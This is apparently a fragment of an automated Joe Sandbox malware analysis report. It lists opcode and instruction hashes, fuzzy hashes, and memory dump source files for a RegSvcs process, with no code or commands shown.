                                                                        • Instruction ID: 219a5118987fbadd9a1d7fd48bf84a4fb561b6f1632b96cd3e555885850de1a7
                                                                        • Opcode Fuzzy Hash: 0d2744a437ebf8b8303fb7480232bcbcb670cd2e3d191a1fceb0333b46df6783
                                                                        • Instruction Fuzzy Hash: B101DF72408308AAEB108A65D880B66BB98EB41774F1CC05BED094A383D37C9840DA72
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1658519915.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_63e0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5905c1ff08e253191434d432b8f87a1dc73a297e86837bc44a7fc11a5d88ee7a
                                                                        • Instruction ID: 819bfb0a390314b526938adf437bb1840397ee5e380f926881fa72820c5bda2f
                                                                        • Opcode Fuzzy Hash: 5905c1ff08e253191434d432b8f87a1dc73a297e86837bc44a7fc11a5d88ee7a
                                                                        • Instruction Fuzzy Hash: E7F0F0372093908FC7130A669C205F1BFBA8D8322130A40D7E980C72A2DA35684ACBB3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5a73eade04c465c789646feb1eef6449ed7d556592d67bed546546aaf68f8c1b
                                                                        • Instruction ID: f1dbd903a6313697e464e3c8fc717b43eea7d46991adcc2a045d312242fab28f
                                                                        • Opcode Fuzzy Hash: 5a73eade04c465c789646feb1eef6449ed7d556592d67bed546546aaf68f8c1b
                                                                        • Instruction Fuzzy Hash: 4DF0E932F282258F9B48DFA8B4004AA77E9EB8817571500BBE10ECB240EF71D941C784
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1625512076.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_fdd000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bdd6227c0ac7569f35359fa0f2da2a72eeac4aa970008cb07afaaac4e2021a37
                                                                        • Instruction ID: e05935a00b48d0f2c9e375e58af3067ca8aca9f4217fcacb7a27454676ddb674
                                                                        • Opcode Fuzzy Hash: bdd6227c0ac7569f35359fa0f2da2a72eeac4aa970008cb07afaaac4e2021a37
                                                                        • Instruction Fuzzy Hash: 99F06271448348AEE7108A16D884B66FFD8EB51774F18C45AED484B287D2799C44CA71
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4c207ecfd0c4b555eb61acfea16449ef5c9732af55c9de9a5e34217c9b9f1210
                                                                        • Instruction ID: 49a21f64c0a560d21ddc998aaf578d579ffa4cbf926f6ebdaccbbd0e2eae4cdc
                                                                        • Opcode Fuzzy Hash: 4c207ecfd0c4b555eb61acfea16449ef5c9732af55c9de9a5e34217c9b9f1210
                                                                        • Instruction Fuzzy Hash: 30D0A912A4F2F14B83033378B8200CABF25890792530A41E3E95CCF207D4148E8A83C2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7f746865b32367c36aed44872c7641f5789323fdfd0fc49be98a1b523d4efb86
                                                                        • Instruction ID: 25560c2f2f68c1c2dd6f052677ea1ef0277492f6b59f13a07dda03233d6fe6c3
                                                                        • Opcode Fuzzy Hash: 7f746865b32367c36aed44872c7641f5789323fdfd0fc49be98a1b523d4efb86
                                                                        • Instruction Fuzzy Hash: 22D0127510C3C08FC303DB24EA604417F72DF9770134544E6D5C4C7556C6304C16C716
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d0d54b71ed1605dd88bf2d354172f6cf726ce61208ebe4016d5b920b41040d31
                                                                        • Instruction ID: 51ba0f154667d9afeeae9e43a11a54c82e710419faecd42d64876d9b138b7579
                                                                        • Opcode Fuzzy Hash: d0d54b71ed1605dd88bf2d354172f6cf726ce61208ebe4016d5b920b41040d31
                                                                        • Instruction Fuzzy Hash: 9BC01230309240DFC301C718D9614197FB25FC12047064453A18597576C5225C10C651